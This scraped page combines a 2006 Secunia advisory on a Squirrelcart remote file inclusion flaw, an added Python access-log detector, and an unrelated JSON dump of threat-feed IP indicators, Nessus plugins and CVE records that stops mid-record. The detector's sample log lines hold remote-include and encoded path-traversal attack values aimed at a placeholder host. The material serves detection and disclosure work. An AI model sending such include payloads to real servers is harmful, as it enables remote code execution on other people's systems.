DESCRIPTION:
OLiBekaS has reported a vulnerability in Squirrelcart, which can be
exploited by malicious people to compromise a vulnerable system.
Input passed to the "cart_isp_root" parameter in cart_content.php is
not properly verified before being used to include files. This can be
exploited to execute arbitrary PHP code by including files from local
or external resources.
The vulnerability has been reported in version 2.2.0. Other versions
may also be affected.
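A detection sketch for the issue described above, added here and not taken from the advisory or from Squirrelcart: it scans web-server access logs for requests that supply "cart_isp_root" to cart_content.php and classifies the supplied value. The log lines, addresses and host names are constructed, and reporting every client-supplied value of this parameter is an assumption about how the script is normally called.

```python
import re
from urllib.parse import parse_qsl, unquote

# Names taken from the advisory text.
SCRIPT = "cart_content.php"
PARAM = "cart_isp_root"

# Request portion of a common/combined-format access log entry.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def fully_decode(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding so nested encoding is seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(raw_value):
    """Label a supplied include-root value by how far it can reach."""
    v = fully_decode(raw_value).replace("\\", "/").lower()
    # A scheme prefix or a network path points the include at an external resource.
    if re.match(r"^(?:[a-z][a-z0-9+.\-]+:|//)", v):
        return "remote-source"
    # Absolute paths, drive letters, parent segments or NUL bytes leave the app directory.
    if "\x00" in v or v.startswith("/") or re.match(r"^[a-z]:/", v) or ".." in v.split("/"):
        return "path-escape"
    # Assumption: the parameter is never legitimately set by the client, so report it anyway.
    return "client-supplied"


def find_hits(lines):
    """Return one record per logged request that sets PARAM on SCRIPT.

    Only the query string is visible in access logs; values sent in a POST
    body need request-body logging or a WAF rule instead.
    """
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        if SCRIPT not in unquote(path).lower().split("/"):
            continue
        for key, value in parse_qsl(query, keep_blank_values=True):
            if key == PARAM:
                hits.append({
                    "ip": m.group("ip"),
                    "method": m.group("method"),
                    "status": int(m.group("status")),
                    "category": classify(value),
                    "value": fully_decode(value),
                })
    return hits


# Constructed sample entries (documentation address ranges, reserved host names).
SAMPLE_LOG = """
192.0.2.10 - - [16/May/2006:10:00:01 +0000] "GET /store/cart_content.php HTTP/1.1" 200 5120
198.51.100.7 - - [16/May/2006:10:02:13 +0000] "GET /store/cart_content.php?cart_isp_root=http%3A%2F%2Fexample.invalid%2Fa.txt HTTP/1.0" 200 312
198.51.100.7 - - [16/May/2006:10:02:40 +0000] "GET /store/cart_content.php?cart_isp_root=..%252f..%252ftmp%252fx HTTP/1.0" 200 0
192.0.2.44 - - [16/May/2006:10:05:00 +0000] "GET /store/index.php?cart_isp_root=http://example.invalid/ HTTP/1.1" 200 900
192.0.2.45 - - [16/May/2006:10:06:30 +0000] "POST /store/cart_content.php?cart_isp_root=includes HTTP/1.1" 200 4100
""".strip()


if __name__ == "__main__":
    for hit in find_hits(SAMPLE_LOG.splitlines()):
        print(f'{hit["ip"]:<15} {hit["status"]} {hit["category"]:<16} {hit["value"]}')
```

A 200 response on a "remote-source" or "path-escape" hit is the case to triage first, since it means the script ran with the supplied value rather than being rejected upstream.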
SOLUTION:
Edit the source code to ensure that input is properly verified.
PROVIDED AND/OR DISCOVERED BY:
OLiBekaS
ORIGINAL ADVISORY:
http://milw0rm.com/exploits/1790
About:
This Advisory was delivered by Secunia as a free service to help
everybody keep their systems up to date against the latest
vulnerabilities.
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
TITLE:
[SA20121] Squirrelcart "cart_isp_root" File Inclusion Vulnerability
SECUNIA ADVISORY ID:
SA20121
VERIFY ADVISORY:
http://secunia.com/advisories/20121/
CRITICAL:
Highly critical
IMPACT:
System access
WHERE:
From remote
SOFTWARE:
Squirrelcart PHP Shopping Cart 2.x
http://secunia.com/product/9957/
PUBLISHED:
2006-05-16
{"rst": [{"lastseen": "2020-09-18T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **211[.]231.106.209** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **39**.\n First seen: 2020-09-02T03:00:00, Last seen: 2020-09-18T03:00:00.\n IOC tags: **generic**.\nASN 38099: (First IP 211.231.97.0, Last IP 211.231.108.255).\nASN Name \"KAKAOASKR\" and Organisation \"Kakao Corp\".\nASN hosts 12694 domains.\nGEO IP information: City \"\", Country \"South Korea\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-09-02T00:00:00", "id": "RST:AAE8DBB6-D8F5-338A-A6BC-684C3971994D", "href": "", "published": "2020-10-09T00:00:00", "title": "RST Threat feed. IOC: 211.231.106.209", "type": "rst", "cvss": {}}, {"lastseen": "2020-08-28T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **211[.]231.106.151** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **51**.\n First seen: 2020-08-28T03:00:00, Last seen: 2020-08-28T03:00:00.\n IOC tags: **generic**.\nASN 38099: (First IP 211.231.97.0, Last IP 211.231.108.255).\nASN Name \"KAKAOASKR\" and Organisation \"Kakao Corp\".\nASN hosts 12694 domains.\nGEO IP information: City \"\", Country \"South Korea\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-08-28T00:00:00", "id": "RST:0D67F89F-A4AD-3E3C-A8FD-68EE61F6DFFD", "href": "", "published": "2020-10-08T00:00:00", "title": "RST Threat feed. 
IOC: 211.231.106.151", "type": "rst", "cvss": {}}, {"lastseen": "2020-09-29T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **211[.]231.106.188** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **51**.\n First seen: 2020-09-29T03:00:00, Last seen: 2020-09-29T03:00:00.\n IOC tags: **generic**.\nASN 38099: (First IP 211.231.97.0, Last IP 211.231.108.255).\nASN Name \"KAKAOASKR\" and Organisation \"Kakao Corp\".\nASN hosts 12694 domains.\nGEO IP information: City \"\", Country \"South Korea\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-09-29T00:00:00", "id": "RST:4BDB89D5-900A-3F12-8414-FA7F524142D0", "href": "", "published": "2020-09-29T00:00:00", "title": "RST Threat feed. IOC: 211.231.106.188", "type": "rst", "cvss": {}}, {"lastseen": "2020-09-26T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **211[.]231.99.68** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **36**.\n First seen: 2020-08-29T03:00:00, Last seen: 2020-09-26T03:00:00.\n IOC tags: **malware**.\nASN 38099: (First IP 211.231.97.0, Last IP 211.231.108.255).\nASN Name \"KAKAOASKR\" and Organisation \"Kakao Corp\".\nASN hosts 12694 domains.\nGEO IP information: City \"\", Country \"South Korea\".\nIn according to RST Threat Feed the IP is related to **cfs5.tistory.com,t1.int.daumcdn.net** malicious domains.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-08-29T00:00:00", "id": "RST:7FFAAC0E-C838-3744-A27E-619936A58889", "href": "", "published": "2020-09-27T00:00:00", "title": "RST Threat feed. 
IOC: 211.231.99.68", "type": "rst", "cvss": {}}, {"lastseen": "2020-09-18T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **211[.]231.106.204** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **51**.\n First seen: 2020-09-18T03:00:00, Last seen: 2020-09-18T03:00:00.\n IOC tags: **generic**.\nASN 38099: (First IP 211.231.97.0, Last IP 211.231.108.255).\nASN Name \"KAKAOASKR\" and Organisation \"Kakao Corp\".\nASN hosts 12694 domains.\nGEO IP information: City \"\", Country \"South Korea\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-09-18T00:00:00", "id": "RST:A81AA3AB-A2D4-32E1-8721-7570DDFA213A", "href": "", "published": "2020-09-18T00:00:00", "title": "RST Threat feed. IOC: 211.231.106.204", "type": "rst", "cvss": {}}, {"lastseen": "2020-09-18T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **211[.]231.106.162** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **51**.\n First seen: 2020-09-18T03:00:00, Last seen: 2020-09-18T03:00:00.\n IOC tags: **generic**.\nASN 38099: (First IP 211.231.97.0, Last IP 211.231.108.255).\nASN Name \"KAKAOASKR\" and Organisation \"Kakao Corp\".\nASN hosts 12694 domains.\nGEO IP information: City \"\", Country \"South Korea\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-09-18T00:00:00", "id": "RST:E428F64D-2E64-3518-A73D-8EC7FC0C440C", "href": "", "published": "2020-09-18T00:00:00", "title": "RST Threat feed. IOC: 211.231.106.162", "type": "rst", "cvss": {}}], "nessus": [{"lastseen": "2020-04-14T06:58:08", "description": "A command injection vulnerability exists in Cisco Firepower Threat Defense due to insufficient input validation. 
An\nauthenticated, local attacker can exploit this, via executing a specific CLI command that includes crafted arguments,\nto execute arbitrary commands.", "edition": 2, "cvss3": {"score": 6.7, "vector": "AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-04-10T00:00:00", "title": "Cisco Firepower Threat Defense Software Command Injection Vulnerability (cisco-sa-20191002-ftd-cmdinj)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-12694"], "modified": "2020-04-10T00:00:00", "cpe": ["cpe:/o:cisco:firepower_threat_defense"], "id": "CISCO-SA-20191002-FTD-CMDINJ.NASL", "href": "https://www.tenable.com/plugins/nessus/135291", "sourceData": "#TRUSTED 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\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135291);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/04/13\");\n\n script_cve_id(\"CVE-2019-12694\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvo45799\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20191002-ftd-cmdinj\");\n script_xref(name:\"IAVA\", value:\"2019-A-0370\");\n\n script_name(english:\"Cisco Firepower Threat Defense Software Command Injection Vulnerability (cisco-sa-20191002-ftd-cmdinj)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch\");\n script_set_attribute(attribute:\"description\", value:\n\"A command injection vulnerability exists in Cisco Firepower Threat Defense due to insufficient input validation. 
An\nauthenticated, local attacker can exploit this, via executing a specific CLI command that includes crafted arguments,\nto execute arbitrary commands.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191002-ftd-cmdinj\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0a585265\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvo45799\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID CSCvo45799\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-12694\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:firepower_threat_defense\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint.nasl\", \"cisco_enumerate_firepower.nbin\", \"cisco_asa_firepower_version.nasl\");\n script_require_keys(\"installed_sw/Cisco Firepower Threat Defense\");\n\n exit(0);\n}\n\ninclude('cisco_workarounds.inc');\ninclude('ccf.inc');\n\nproduct_info = cisco::get_product_info(name:'Cisco Firepower Threat Defense');\n\nvuln_ranges = [\n {'min_ver' : '0.0', 'fix_ver' : '6.3.0.5'},\n {'min_ver' : '6.4', 'fix_ver' : '6.4.0.4'}\n];\nworkarounds = make_list(CISCO_WORKAROUNDS['no_workaround']);\nworkaround_params = make_list();\n\nreporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_HOLE,\n 'version' , product_info['version'],\n 'bug_id' , 'CSCvo45799'\n);\n\ncisco::check_and_report(\n product_info:product_info,\n workarounds:workarounds,\n workaround_params:workaround_params,\n reporting:reporting,\n vuln_ranges:vuln_ranges\n);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T14:46:16", "description": "This update for ImageMagick fixes the following issues :\n\n - security update :\n\n - CVE-2016-6520: buffer overflow [bsc#991872]\n\n - CVE-2016-6491: Out-of-bounds read in CopyMagickMemory\n [bsc#991445]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 29, "cvss3": {"score": 9.1, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H"}, "published": "2016-09-02T00:00:00", "title": "SUSE SLES11 Security Update : ImageMagick (SUSE-SU-2016:2075-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6491", "CVE-2016-6520"], "modified": "2016-09-02T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:libMagickCore1"], "id": "SUSE_SU-2016-2075-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93290", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:2075-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93290);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-6491\", \"CVE-2016-6520\");\n\n script_name(english:\"SUSE SLES11 Security Update : ImageMagick (SUSE-SU-2016:2075-1)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for ImageMagick fixes the following issues :\n\n - security update :\n\n - CVE-2016-6520: buffer overflow [bsc#991872]\n\n - CVE-2016-6491: Out-of-bounds read in CopyMagickMemory\n [bsc#991445]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=991445\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=991872\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-6491/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-6520/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20162075-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5fbfc865\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 11-SP4:zypper in -t\npatch sdksp4-ImageMagick-12694=1\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-ImageMagick-12694=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-ImageMagick-12694=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libMagickCore1\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! 
preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"libMagickCore1-32bit-6.4.3.6-7.48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"s390x\", reference:\"libMagickCore1-32bit-6.4.3.6-7.48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"libMagickCore1-6.4.3.6-7.48.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ImageMagick\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2020-10-03T12:01:15", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-12T01:15:00", "title": "CVE-2014-2595", "type": "cve", "cwe": ["CWE-613"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2595"], "modified": "2020-02-20T15:55:00", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "id": "CVE-2014-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:28", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 7, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-18T22:15:00", "title": "CVE-2008-7273", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7273"], "modified": "2019-11-20T15:56:00", "cpe": [], "id": "CVE-2008-7273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2020-12-09T19:28:28", "description": 
"FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-08T00:15:00", "title": "CVE-2008-7272", "type": "cve", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7272"], "modified": "2020-02-10T21:16:00", "cpe": [], "id": "CVE-2008-7272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2020-12-09T21:41:41", "description": "A vulnerability in the command line interface (CLI) of Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, local attacker with administrative privileges to execute commands on the underlying operating system with root privileges. The vulnerability is due to insufficient input validation. 
An attacker could exploit this vulnerability by executing a specific CLI command that includes crafted arguments. A successful exploit could allow the attacker to execute commands on the underlying OS with root privileges.", "edition": 12, "cvss3": {"exploitabilityScore": 0.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 6.7, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-02T19:15:00", "title": "CVE-2019-12694", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-12694"], "modified": "2019-10-10T16:57:00", "cpe": [], "id": "CVE-2019-12694", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-12694", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2020-12-09T20:03:10", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-04-30T14:29:00", "title": "CVE-2015-9286", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9286"], "modified": "2019-05-01T14:22:00", "cpe": [], "id": "CVE-2015-9286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2020-10-03T13:20:12", "description": "TP-Link TL-WA850RE Wi-Fi Range Extender with hardware version 5 allows remote attackers to cause a denial of service (reboot) via data/reboot.json.", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", 